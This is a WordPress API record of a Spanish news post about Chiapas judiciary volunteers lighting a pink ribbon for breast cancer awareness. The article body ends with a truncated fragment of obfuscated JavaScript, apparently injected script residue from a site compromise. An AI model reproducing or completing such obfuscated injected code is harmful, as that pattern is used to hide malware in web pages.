{"id":5607,"date":"2022-10-04T22:23:13","date_gmt":"2022-10-04T22:23:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5607"},"modified":"2022-10-04T22:23:13","modified_gmt":"2022-10-04T22:23:13","slug":"realiza-voluntariado-del-poder-judicial-acciones-para-sensibilizar-la-lucha-contra-el-cancer-de-mama","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5607","title":{"rendered":"Realiza Voluntariado del Poder Judicial acciones para sensibilizar la Lucha Contra el C\u00e1ncer de Mama"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-04-at-8.35.22-AM-1024x682.jpeg\" alt=\"\" class=\"wp-image-5608\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-04-at-8.35.22-AM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-04-at-8.35.22-AM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-04-at-8.35.22-AM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-04-at-8.35.22-AM-1536x1023.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-04-at-8.35.22-AM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/WhatsApp-Image-2022-10-04-at-8.35.22-AM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>04 de octubre del 2022. Tuxtla Guti\u00e9rrez; Chiapas.- El Voluntariado del Poder Judicial que preside Josefa Sangeado Camacho, llev\u00f3 a cabo el encendido de un mo\u00f1o y de luminarias en color rosa en las instalaciones de esta casa de la justicia, como parte de las acciones para conmemorar el D\u00eda Mundial de la Lucha contra el C\u00e1ncer de Mama.<\/p>\n\n\n\n<p>Este acto encabezado por Sangeado Camacho acompa\u00f1ada de las consejeras de la Judicatura del Estado, Isela de Jes\u00fas Mart\u00ednez Flores y Mar\u00eda Itzel Ballinas Barbosa, fortalece las actividades contempladas en la Semana Rosa, que se llevar\u00e1n a cabo del 10 al 14 de octubre.<\/p>\n\n\n\n<p>\u201cHoy en el marco del D\u00eda Mundial de la Lucha contra el C\u00e1ncer de Mama, que se celebra el 19 de octubre, encendemos este mo\u00f1o color rosa, como parte de la lucha contra ese flagelo que no s\u00f3lo ataca a las mujeres, sino tambi\u00e9n a los hombres, es por ello, que en la Semana Rosa se realizar\u00e1n acciones y actividades para la detecci\u00f3n temprana del C\u00e1ncer de Mama\u201d, anunci\u00f3 Josefa Sangeado Camacho.<\/p>\n\n\n\n<p>Esta luminaria rosa que se apreciar\u00e1 todo el mes de octubre en la fachada principal del Palacio de Justicia de Tuxtla Guti\u00e9rrez, es parte del apoyo a la sensibilizaci\u00f3n y concientizaci\u00f3n de la importancia de la detecci\u00f3n temprana, a fin de mejorar el pron\u00f3stico y la supervivencia de los casos de c\u00e1ncer de mama, lo cual sigue siendo la piedra angular de la lucha contra esta enfermedad.<\/p>\n\n\n\n<p>En este evento acudieron sociedad civil, la familia judicial en general adem\u00e1s de la coordinadora del Voluntariado del Poder Judicial, Adriana Alonso Cruz; la oficial mayor, Natividad Esperanza Gallardo Ramos y el director de Recursos Humanos, Abraham D\u00edaz Hern\u00e1ndez; adem\u00e1s se cont\u00f3 con la presencia de las damas voluntarias Karla Zenteno Zenteno y Mar\u00eda Isabel Alfaro Alfaro, juezas, jueces, directoras, directores, integrantes del Voluntariado, y personal administrativo y jurisdiccional de este Poder Judicial.<\/p>\n\n\n\n<p>Direcci\u00f3n de Comunicaci\u00f3n Social<br>y Relaciones P\u00fablicas<br>61 7 87 00 Ext. 8020\/8021<br>f : \/poderjudicial.chiapas<br>t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>04 de octubre del 2022. Tuxtla Guti\u00e9rrez; Chiapas.- El Voluntariado del Poder Judicial que preside Josefa Sangeado Camacho, llev\u00f3 a cabo el encendido de un mo\u00f1o y de luminarias en color rosa en las instalaciones de esta casa de la justicia, como parte de las acciones para conmemorar el D\u00eda Mundial de la Lucha contra &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5608,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5607","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5607","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5607"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5607\/revisions"}],"predecessor-version":[{"id":5609,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5607\/revisions\/5609"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5608"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5607"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5607"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}